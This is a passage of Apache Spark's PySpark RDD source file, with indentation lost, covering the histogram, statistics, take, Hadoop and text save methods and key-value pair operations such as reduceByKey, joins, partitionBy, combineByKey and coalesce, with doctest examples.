([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
